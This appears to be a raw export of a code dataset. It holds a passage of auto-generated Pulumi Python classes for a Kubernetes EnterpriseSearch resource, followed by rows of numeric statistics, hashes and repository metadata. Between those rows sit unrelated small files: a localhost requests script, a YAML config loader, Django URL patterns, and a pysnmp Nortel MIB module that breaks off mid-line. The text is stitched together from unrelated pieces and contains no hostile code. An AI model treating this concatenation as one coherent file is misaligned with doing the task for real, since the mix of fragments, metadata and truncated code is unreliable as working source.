More info: https://kubernetes.io/docs/concepts/services-networking/service/#defining-a-service """ pulumi.set(__self__, "port", port) if app_protocol is not None: pulumi.set(__self__, "app_protocol", app_protocol) if name is not None: pulumi.set(__self__, "name", name) if node_port is not None: pulumi.set(__self__, "node_port", node_port) if protocol is not None: pulumi.set(__self__, "protocol", protocol) if target_port is not None: pulumi.set(__self__, "target_port", target_port) @property @pulumi.getter def port(self) -> pulumi.Input[int]: """ The port that will be exposed by this service. """ return pulumi.get(self, "port") @port.setter def port(self, value: pulumi.Input[int]): pulumi.set(self, "port", value) @property @pulumi.getter(name="appProtocol") def app_protocol(self) -> Optional[pulumi.Input[str]]: """ The application protocol for this port. This field follows standard Kubernetes label syntax. Un-prefixed names are reserved for IANA standard service names (as per RFC-6335 and http://www.iana.org/assignments/service-names). Non-standard protocols should use prefixed names such as mycompany.com/my-custom-protocol. Field can be enabled with ServiceAppProtocol feature gate. """ return pulumi.get(self, "app_protocol") @app_protocol.setter def app_protocol(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "app_protocol", value) @property @pulumi.getter def name(self) -> Optional[pulumi.Input[str]]: """ The name of this port within the service. This must be a DNS_LABEL. All ports within a ServiceSpec must have unique names. When considering the endpoints for a Service, this must match the 'name' field in the EndpointPort. Optional if only one ServicePort is defined on this service. 
""" return pulumi.get(self, "name") @name.setter def name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "name", value) @property @pulumi.getter(name="nodePort") def node_port(self) -> Optional[pulumi.Input[int]]: """ The port on each node on which this service is exposed when type=NodePort or LoadBalancer. Usually assigned by the system. If specified, it will be allocated to the service if unused or else creation of the service will fail. Default is to auto-allocate a port if the ServiceType of this Service requires one. More info: https://kubernetes.io/docs/concepts/services-networking/service/#type-nodeport """ return pulumi.get(self, "node_port") @node_port.setter def node_port(self, value: Optional[pulumi.Input[int]]): pulumi.set(self, "node_port", value) @property @pulumi.getter def protocol(self) -> Optional[pulumi.Input[str]]: """ The IP protocol for this port. Supports "TCP", "UDP", and "SCTP". Default is TCP. """ return pulumi.get(self, "protocol") @protocol.setter def protocol(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "protocol", value) @property @pulumi.getter(name="targetPort") def target_port(self) -> Optional[pulumi.Input['EnterpriseSearchSpecHttpServiceSpecPortsTargetPortArgs']]: """ Number or name of the port to access on the pods targeted by the service. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. If this is a string, it will be looked up as a named port in the target Pod's container ports. If this is not specified, the value of the 'port' field is used (an identity map). This field is ignored for services with clusterIP=None, and should be omitted or set equal to the 'port' field. 
More info: https://kubernetes.io/docs/concepts/services-networking/service/#defining-a-service """ return pulumi.get(self, "target_port") @target_port.setter def target_port(self, value: Optional[pulumi.Input['EnterpriseSearchSpecHttpServiceSpecPortsTargetPortArgs']]): pulumi.set(self, "target_port", value) @pulumi.input_type class EnterpriseSearchSpecHttpServiceSpecPortsTargetPortArgs: def __init__(__self__): pass @pulumi.input_type class EnterpriseSearchSpecHttpServiceSpecSessionAffinityConfigArgs: def __init__(__self__, *, client_ip: Optional[pulumi.Input['EnterpriseSearchSpecHttpServiceSpecSessionAffinityConfigClientIPArgs']] = None): """ sessionAffinityConfig contains the configurations of session affinity. :param pulumi.Input['EnterpriseSearchSpecHttpServiceSpecSessionAffinityConfigClientIPArgs'] client_ip: clientIP contains the configurations of Client IP based session affinity. """ if client_ip is not None: pulumi.set(__self__, "client_ip", client_ip) @property @pulumi.getter(name="clientIP") def client_ip(self) -> Optional[pulumi.Input['EnterpriseSearchSpecHttpServiceSpecSessionAffinityConfigClientIPArgs']]: """ clientIP contains the configurations of Client IP based session affinity. """ return pulumi.get(self, "client_ip") @client_ip.setter def client_ip(self, value: Optional[pulumi.Input['EnterpriseSearchSpecHttpServiceSpecSessionAffinityConfigClientIPArgs']]): pulumi.set(self, "client_ip", value) @pulumi.input_type class EnterpriseSearchSpecHttpServiceSpecSessionAffinityConfigClientIPArgs: def __init__(__self__, *, timeout_seconds: Optional[pulumi.Input[int]] = None): """ clientIP contains the configurations of Client IP based session affinity. :param pulumi.Input[int] timeout_seconds: timeoutSeconds specifies the seconds of ClientIP type session sticky time. The value must be >0 && <=86400(for 1 day) if ServiceAffinity == "ClientIP". Default value is 10800(for 3 hours). 
""" if timeout_seconds is not None: pulumi.set(__self__, "timeout_seconds", timeout_seconds) @property @pulumi.getter(name="timeoutSeconds") def timeout_seconds(self) -> Optional[pulumi.Input[int]]: """ timeoutSeconds specifies the seconds of ClientIP type session sticky time. The value must be >0 && <=86400(for 1 day) if ServiceAffinity == "ClientIP". Default value is 10800(for 3 hours). """ return pulumi.get(self, "timeout_seconds") @timeout_seconds.setter def timeout_seconds(self, value: Optional[pulumi.Input[int]]): pulumi.set(self, "timeout_seconds", value) @pulumi.input_type class EnterpriseSearchSpecHttpTlsArgs: def __init__(__self__, *, certificate: Optional[pulumi.Input['EnterpriseSearchSpecHttpTlsCertificateArgs']] = None, self_signed_certificate: Optional[pulumi.Input['EnterpriseSearchSpecHttpTlsSelfSignedCertificateArgs']] = None): """ TLS defines options for configuring TLS for HTTP. :param pulumi.Input['EnterpriseSearchSpecHttpTlsCertificateArgs'] certificate: Certificate is a reference to a Kubernetes secret that contains the certificate and private key for enabling TLS. The referenced secret should contain the following: - `ca.crt`: The certificate authority (optional). - `tls.crt`: The certificate (or a chain). - `tls.key`: The private key to the first certificate in the certificate chain. :param pulumi.Input['EnterpriseSearchSpecHttpTlsSelfSignedCertificateArgs'] self_signed_certificate: SelfSignedCertificate allows configuring the self-signed certificate generated by the operator. """ if certificate is not None: pulumi.set(__self__, "certificate", certificate) if self_signed_certificate is not None: pulumi.set(__self__, "self_signed_certificate", self_signed_certificate) @property @pulumi.getter def certificate(self) -> Optional[pulumi.Input['EnterpriseSearchSpecHttpTlsCertificateArgs']]: """ Certificate is a reference to a Kubernetes secret that contains the certificate and private key for enabling TLS. 
The referenced secret should contain the following: - `ca.crt`: The certificate authority (optional). - `tls.crt`: The certificate (or a chain). - `tls.key`: The private key to the first certificate in the certificate chain. """ return pulumi.get(self, "certificate") @certificate.setter def certificate(self, value: Optional[pulumi.Input['EnterpriseSearchSpecHttpTlsCertificateArgs']]): pulumi.set(self, "certificate", value) @property @pulumi.getter(name="selfSignedCertificate") def self_signed_certificate(self) -> Optional[pulumi.Input['EnterpriseSearchSpecHttpTlsSelfSignedCertificateArgs']]: """ SelfSignedCertificate allows configuring the self-signed certificate generated by the operator. """ return pulumi.get(self, "self_signed_certificate") @self_signed_certificate.setter def self_signed_certificate(self, value: Optional[pulumi.Input['EnterpriseSearchSpecHttpTlsSelfSignedCertificateArgs']]): pulumi.set(self, "self_signed_certificate", value) @pulumi.input_type class EnterpriseSearchSpecHttpTlsCertificateArgs: def __init__(__self__, *, secret_name: Optional[pulumi.Input[str]] = None): """ Certificate is a reference to a Kubernetes secret that contains the certificate and private key for enabling TLS. The referenced secret should contain the following: - `ca.crt`: The certificate authority (optional). - `tls.crt`: The certificate (or a chain). - `tls.key`: The private key to the first certificate in the certificate chain. :param pulumi.Input[str] secret_name: SecretName is the name of the secret. """ if secret_name is not None: pulumi.set(__self__, "secret_name", secret_name) @property @pulumi.getter(name="secretName") def secret_name(self) -> Optional[pulumi.Input[str]]: """ SecretName is the name of the secret. 
""" return pulumi.get(self, "secret_name") @secret_name.setter def secret_name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "secret_name", value) @pulumi.input_type class EnterpriseSearchSpecHttpTlsSelfSignedCertificateArgs: def __init__(__self__, *, disabled: Optional[pulumi.Input[bool]] = None, subject_alt_names: Optional[pulumi.Input[Sequence[pulumi.Input['EnterpriseSearchSpecHttpTlsSelfSignedCertificateSubjectAltNamesArgs']]]] = None): """ SelfSignedCertificate allows configuring the self-signed certificate generated by the operator. :param pulumi.Input[bool] disabled: Disabled indicates that the provisioning of the self-signed certifcate should be disabled. :param pulumi.Input[Sequence[pulumi.Input['EnterpriseSearchSpecHttpTlsSelfSignedCertificateSubjectAltNamesArgs']]] subject_alt_names: SubjectAlternativeNames is a list of SANs to include in the generated HTTP TLS certificate. """ if disabled is not None: pulumi.set(__self__, "disabled", disabled) if subject_alt_names is not None: pulumi.set(__self__, "subject_alt_names", subject_alt_names) @property @pulumi.getter def disabled(self) -> Optional[pulumi.Input[bool]]: """ Disabled indicates that the provisioning of the self-signed certifcate should be disabled. """ return pulumi.get(self, "disabled") @disabled.setter def disabled(self, value: Optional[pulumi.Input[bool]]): pulumi.set(self, "disabled", value) @property @pulumi.getter(name="subjectAltNames") def subject_alt_names(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['EnterpriseSearchSpecHttpTlsSelfSignedCertificateSubjectAltNamesArgs']]]]: """ SubjectAlternativeNames is a list of SANs to include in the generated HTTP TLS certificate. 
""" return pulumi.get(self, "subject_alt_names") @subject_alt_names.setter def subject_alt_names(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['EnterpriseSearchSpecHttpTlsSelfSignedCertificateSubjectAltNamesArgs']]]]): pulumi.set(self, "subject_alt_names", value) @pulumi.input_type class EnterpriseSearchSpecHttpTlsSelfSignedCertificateSubjectAltNamesArgs: def __init__(__self__, *, dns: Optional[pulumi.Input[str]] = None, ip: Optional[pulumi.Input[str]] = None): """ SubjectAlternativeName represents a SAN entry in a x509 certificate. :param pulumi.Input[str] dns: DNS is the DNS name of the subject. :param pulumi.Input[str] ip: IP is the IP address of the subject. """ if dns is not None: pulumi.set(__self__, "dns", dns) if ip is not None: pulumi.set(__self__, "ip", ip) @property @pulumi.getter def dns(self) -> Optional[pulumi.Input[str]]: """ DNS is the DNS name of the subject. """ return pulumi.get(self, "dns") @dns.setter def dns(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "dns", value) @property @pulumi.getter def ip(self) -> Optional[pulumi.Input[str]]: """ IP is the IP address of the subject. """ return pulumi.get(self, "ip") @ip.setter def ip(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "ip", value) @pulumi.input_type class EnterpriseSearchStatusArgs: def __init__(__self__, *, association_status: Optional[pulumi.Input[str]] = None, available_nodes: Optional[pulumi.Input[int]] = None, health: Optional[pulumi.Input[str]] = None, service: Optional[pulumi.Input[str]] = None, version: Optional[pulumi.Input[str]] = None): """ EnterpriseSearchStatus defines the observed state of EnterpriseSearch :param pulumi.Input[str] association_status: Association is the status of any auto-linking to Elasticsearch clusters. :param pulumi.Input[int] available_nodes: AvailableNodes is the number of available replicas in the deployment. :param pulumi.Input[str] health: Health of the deployment. 
:param pulumi.Input[str] service: ExternalService is the name of the service associated to the Enterprise Search Pods. :param pulumi.Input[str] version: Version of the stack resource currently running. During version upgrades, multiple versions may run in parallel: this value specifies the lowest version currently running. """ if association_status is not None: pulumi.set(__self__, "association_status", association_status) if available_nodes is not None: pulumi.set(__self__, "available_nodes", available_nodes) if health is not None: pulumi.set(__self__, "health", health) if service is not None: pulumi.set(__self__, "service", service) if version is not None: pulumi.set(__self__, "version", version) @property @pulumi.getter(name="associationStatus") def association_status(self) -> Optional[pulumi.Input[str]]: """ Association is the status of any auto-linking to Elasticsearch clusters. """ return pulumi.get(self, "association_status") @association_status.setter def association_status(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "association_status", value) @property @pulumi.getter(name="availableNodes") def available_nodes(self) -> Optional[pulumi.Input[int]]: """ AvailableNodes is the number of available replicas in the deployment. """ return pulumi.get(self, "available_nodes") @available_nodes.setter def available_nodes(self, value: Optional[pulumi.Input[int]]): pulumi.set(self, "available_nodes", value) @property @pulumi.getter def health(self) -> Optional[pulumi.Input[str]]: """ Health of the deployment. """ return pulumi.get(self, "health") @health.setter def health(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "health", value) @property @pulumi.getter def service(self) -> Optional[pulumi.Input[str]]: """ ExternalService is the name of the service associated to the Enterprise Search Pods. 
""" return pulumi.get(self, "service") @service.setter def service(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "service", value) @property @pulumi.getter def version(self) -> Optional[pulumi.Input[str]]: """ Version of the stack resource currently running. During version upgrades, multiple versions may run in parallel: this value specifies the lowest version currently running. """ return pulumi.get(self, "version") @version.setter def version(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "version", value)
57.832988
905
0.711413
6,858
55,751
5.67527
0.078157
0.068678
0.071761
0.037306
0.794841
0.705069
0.642198
0.578813
0.553403
0.524113
0
0.001773
0.200642
55,751
963
906
57.893043
0.871581
0.460512
0
0.270833
1
0
0.159318
0.105454
0
0
0
0
0
1
0.203125
false
0.001736
0.008681
0
0.326389
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
3
f736ed591c705009f410e5f41e8edef29949cfa3
138
py
Python
test/api_test.py
adi4387/titanic
d45a124781ba1cb2b194c179725f856faea8c082
[ "MIT" ]
null
null
null
test/api_test.py
adi4387/titanic
d45a124781ba1cb2b194c179725f856faea8c082
[ "MIT" ]
null
null
null
test/api_test.py
adi4387/titanic
d45a124781ba1cb2b194c179725f856faea8c082
[ "MIT" ]
null
null
null
import json import requests data = json.dumps({'name':'Aditya'}) res = requests.post('http://127.0.0.1:10001/api', data) print(res.text)
19.714286
55
0.695652
23
138
4.173913
0.73913
0
0
0
0
0
0
0
0
0
0
0.088
0.094203
138
6
56
23
0.68
0
0
0
0
0
0.26087
0
0
0
0
0
0
1
0
false
0
0.4
0
0.4
0.2
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
3
f73a9408751376983aedf679f68c28c3da0028c9
140
py
Python
config.py
bsoyka/sunset-bot
ea05000e52e1883ddba77ab754e5f733c8b3375c
[ "MIT" ]
1
2021-06-21T16:58:48.000Z
2021-06-21T16:58:48.000Z
config.py
bsoyka/sunset-bot
ea05000e52e1883ddba77ab754e5f733c8b3375c
[ "MIT" ]
4
2021-08-13T16:52:51.000Z
2021-09-01T13:05:42.000Z
config.py
sunset-vacation/bot
ea05000e52e1883ddba77ab754e5f733c8b3375c
[ "MIT" ]
4
2021-06-21T22:16:12.000Z
2021-08-11T21:01:19.000Z
from pathlib import Path from dynamic_yaml import load with (Path(__file__).parent / 'config.yaml').open() as f: CONFIG = load(f)
23.333333
58
0.692857
21
140
4.380952
0.666667
0
0
0
0
0
0
0
0
0
0
0
0.192857
140
5
59
28
0.814159
0
0
0
0
0
0.081481
0
0
0
0
0
0
1
0
false
0
0.5
0
0.5
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
3
f743ef1f6c6a7987bbec9b57f3aab00ae11ba480
112
py
Python
nslocalizer.py
kolyadenko/nslocalizer
70fab1f5bc6f0ebfe7f7e394dc1739ea50cde29a
[ "BSD-3-Clause" ]
172
2016-09-03T22:27:37.000Z
2022-03-09T03:35:49.000Z
nslocalizer.py
kolyadenko/nslocalizer
70fab1f5bc6f0ebfe7f7e394dc1739ea50cde29a
[ "BSD-3-Clause" ]
7
2016-12-19T12:22:50.000Z
2019-05-03T06:38:46.000Z
nslocalizer.py
kolyadenko/nslocalizer
70fab1f5bc6f0ebfe7f7e394dc1739ea50cde29a
[ "BSD-3-Clause" ]
11
2016-09-04T14:04:13.000Z
2021-05-21T12:05:16.000Z
#!/usr/bin/python import nslocalizer def main(): nslocalizer.main() if __name__ == "__main__": main()
12.444444
26
0.651786
13
112
5
0.692308
0
0
0
0
0
0
0
0
0
0
0
0.1875
112
9
27
12.444444
0.714286
0.142857
0
0
0
0
0.083333
0
0
0
0
0
0
1
0.2
true
0
0.2
0
0.4
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
3
f75ba07b5b28c452cc03c74482f21cbdd17a28fb
174
py
Python
catalog/urls.py
Rezakarimpy/SUS
0cbb262a699326a412d46a81a32771bfcf48cc51
[ "Apache-2.0" ]
null
null
null
catalog/urls.py
Rezakarimpy/SUS
0cbb262a699326a412d46a81a32771bfcf48cc51
[ "Apache-2.0" ]
null
null
null
catalog/urls.py
Rezakarimpy/SUS
0cbb262a699326a412d46a81a32771bfcf48cc51
[ "Apache-2.0" ]
null
null
null
from django.urls import path from . import views urlpatterns = [ path('', views.index, name='index'), path('books/', views.BookListView.as_view(), name='books'), ]
24.857143
63
0.66092
22
174
5.181818
0.590909
0
0
0
0
0
0
0
0
0
0
0
0.16092
174
7
64
24.857143
0.780822
0
0
0
0
0
0.091429
0
0
0
0
0
0
1
0
false
0
0.333333
0
0.333333
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
3
f75de59575b5403a37c2104b2565c99adfed57c6
22,408
py
Python
pysnmp/Nortel-MsCarrier-MscPassport-DataCollectionMIB.py
agustinhenze/mibs.snmplabs.com
1fc5c07860542b89212f4c8ab807057d9a9206c7
[ "Apache-2.0" ]
11
2021-02-02T16:27:16.000Z
2021-08-31T06:22:49.000Z
pysnmp/Nortel-MsCarrier-MscPassport-DataCollectionMIB.py
agustinhenze/mibs.snmplabs.com
1fc5c07860542b89212f4c8ab807057d9a9206c7
[ "Apache-2.0" ]
75
2021-02-24T17:30:31.000Z
2021-12-08T00:01:18.000Z
pysnmp/Nortel-MsCarrier-MscPassport-DataCollectionMIB.py
agustinhenze/mibs.snmplabs.com
1fc5c07860542b89212f4c8ab807057d9a9206c7
[ "Apache-2.0" ]
10
2019-04-30T05:51:36.000Z
2022-02-16T03:33:41.000Z
# # PySNMP MIB module Nortel-MsCarrier-MscPassport-DataCollectionMIB (http://snmplabs.com/pysmi) # ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/Nortel-MsCarrier-MscPassport-DataCollectionMIB # Produced by pysmi-0.3.4 at Mon Apr 29 20:20:12 2019 # On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4 # Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15) # ObjectIdentifier, OctetString, Integer = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "OctetString", "Integer") NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues") ConstraintsUnion, SingleValueConstraint, ValueRangeConstraint, ValueSizeConstraint, ConstraintsIntersection = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsUnion", "SingleValueConstraint", "ValueRangeConstraint", "ValueSizeConstraint", "ConstraintsIntersection") DisplayString, Integer32, RowStatus, Gauge32, Counter32, Unsigned32, StorageType = mibBuilder.importSymbols("Nortel-MsCarrier-MscPassport-StandardTextualConventionsMIB", "DisplayString", "Integer32", "RowStatus", "Gauge32", "Counter32", "Unsigned32", "StorageType") AsciiString, EnterpriseDateAndTime, NonReplicated = mibBuilder.importSymbols("Nortel-MsCarrier-MscPassport-TextualConventionsMIB", "AsciiString", "EnterpriseDateAndTime", "NonReplicated") mscPassportMIBs, mscComponents = mibBuilder.importSymbols("Nortel-MsCarrier-MscPassport-UsefulDefinitionsMIB", "mscPassportMIBs", "mscComponents") NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance") Integer32, Counter64, MibIdentifier, NotificationType, ObjectIdentity, MibScalar, MibTable, MibTableRow, MibTableColumn, TimeTicks, ModuleIdentity, IpAddress, iso, Gauge32, Counter32, Bits, Unsigned32 = mibBuilder.importSymbols("SNMPv2-SMI", "Integer32", "Counter64", "MibIdentifier", "NotificationType", "ObjectIdentity", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "TimeTicks", 
"ModuleIdentity", "IpAddress", "iso", "Gauge32", "Counter32", "Bits", "Unsigned32") DisplayString, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TextualConvention") dataCollectionMIB = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 14)) mscCol = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21)) mscColRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 1), ) if mibBuilder.loadTexts: mscColRowStatusTable.setStatus('mandatory') mscColRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 1, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColIndex")) if mibBuilder.loadTexts: mscColRowStatusEntry.setStatus('mandatory') mscColRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 1, 1, 1), RowStatus()).setMaxAccess("readwrite") if mibBuilder.loadTexts: mscColRowStatus.setStatus('mandatory') mscColComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 1, 1, 2), DisplayString()).setMaxAccess("readonly") if mibBuilder.loadTexts: mscColComponentName.setStatus('mandatory') mscColStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 1, 1, 4), StorageType()).setMaxAccess("readonly") if mibBuilder.loadTexts: mscColStorageType.setStatus('mandatory') mscColIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 1, 1, 10), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("accounting", 0), ("alarm", 1), ("log", 2), ("debug", 3), ("scn", 4), ("trap", 5), ("stats", 6)))) if mibBuilder.loadTexts: mscColIndex.setStatus('mandatory') mscColProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 10), ) if mibBuilder.loadTexts: mscColProvTable.setStatus('mandatory') mscColProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 10, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColIndex")) if mibBuilder.loadTexts: 
mscColProvEntry.setStatus('mandatory') mscColAgentQueueSize = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 10, 1, 1), Unsigned32().subtype(subtypeSpec=ConstraintsUnion(ValueRangeConstraint(0, 0), ValueRangeConstraint(20, 10000), ))).setMaxAccess("readwrite") if mibBuilder.loadTexts: mscColAgentQueueSize.setStatus('obsolete') mscColStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 11), ) if mibBuilder.loadTexts: mscColStatsTable.setStatus('mandatory') mscColStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 11, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColIndex")) if mibBuilder.loadTexts: mscColStatsEntry.setStatus('mandatory') mscColCurrentQueueSize = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 11, 1, 1), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly") if mibBuilder.loadTexts: mscColCurrentQueueSize.setStatus('mandatory') mscColRecordsRx = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 11, 1, 2), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: mscColRecordsRx.setStatus('mandatory') mscColRecordsDiscarded = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 11, 1, 3), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: mscColRecordsDiscarded.setStatus('mandatory') mscColTimesTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 266), ) if mibBuilder.loadTexts: mscColTimesTable.setStatus('mandatory') mscColTimesEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 266, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColIndex"), (0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColTimesValue")) if mibBuilder.loadTexts: mscColTimesEntry.setStatus('mandatory') mscColTimesValue = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 266, 1, 1), EnterpriseDateAndTime().subtype(subtypeSpec=ValueSizeConstraint(5, 5)).setFixedLength(5)).setMaxAccess("readwrite") if 
mibBuilder.loadTexts: mscColTimesValue.setStatus('mandatory') mscColTimesRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 266, 1, 2), RowStatus()).setMaxAccess("writeonly") if mibBuilder.loadTexts: mscColTimesRowStatus.setStatus('mandatory') mscColLastTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 275), ) if mibBuilder.loadTexts: mscColLastTable.setStatus('obsolete') mscColLastEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 275, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColIndex"), (0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColLastValue")) if mibBuilder.loadTexts: mscColLastEntry.setStatus('obsolete') mscColLastValue = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 275, 1, 1), EnterpriseDateAndTime().subtype(subtypeSpec=ValueSizeConstraint(19, 19)).setFixedLength(19)).setMaxAccess("readonly") if mibBuilder.loadTexts: mscColLastValue.setStatus('obsolete') mscColPeakTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 279), ) if mibBuilder.loadTexts: mscColPeakTable.setStatus('mandatory') mscColPeakEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 279, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColIndex"), (0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColPeakValue")) if mibBuilder.loadTexts: mscColPeakEntry.setStatus('mandatory') mscColPeakValue = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 279, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 15))).setMaxAccess("readwrite") if mibBuilder.loadTexts: mscColPeakValue.setStatus('mandatory') mscColPeakRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 279, 1, 2), RowStatus()).setMaxAccess("writeonly") if mibBuilder.loadTexts: mscColPeakRowStatus.setStatus('mandatory') mscColSp = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2)) mscColSpRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 1), ) if mibBuilder.loadTexts: 
mscColSpRowStatusTable.setStatus('mandatory') mscColSpRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 1, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColIndex"), (0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColSpIndex")) if mibBuilder.loadTexts: mscColSpRowStatusEntry.setStatus('mandatory') mscColSpRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 1, 1, 1), RowStatus()).setMaxAccess("readonly") if mibBuilder.loadTexts: mscColSpRowStatus.setStatus('mandatory') mscColSpComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 1, 1, 2), DisplayString()).setMaxAccess("readonly") if mibBuilder.loadTexts: mscColSpComponentName.setStatus('mandatory') mscColSpStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 1, 1, 4), StorageType()).setMaxAccess("readonly") if mibBuilder.loadTexts: mscColSpStorageType.setStatus('mandatory') mscColSpIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 1, 1, 10), NonReplicated()) if mibBuilder.loadTexts: mscColSpIndex.setStatus('mandatory') mscColSpProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 10), ) if mibBuilder.loadTexts: mscColSpProvTable.setStatus('mandatory') mscColSpProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 10, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColIndex"), (0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColSpIndex")) if mibBuilder.loadTexts: mscColSpProvEntry.setStatus('mandatory') mscColSpSpooling = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 10, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("off", 0), ("on", 1)))).setMaxAccess("readwrite") if mibBuilder.loadTexts: mscColSpSpooling.setStatus('mandatory') mscColSpMaximumNumberOfFiles = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 10, 1, 2), 
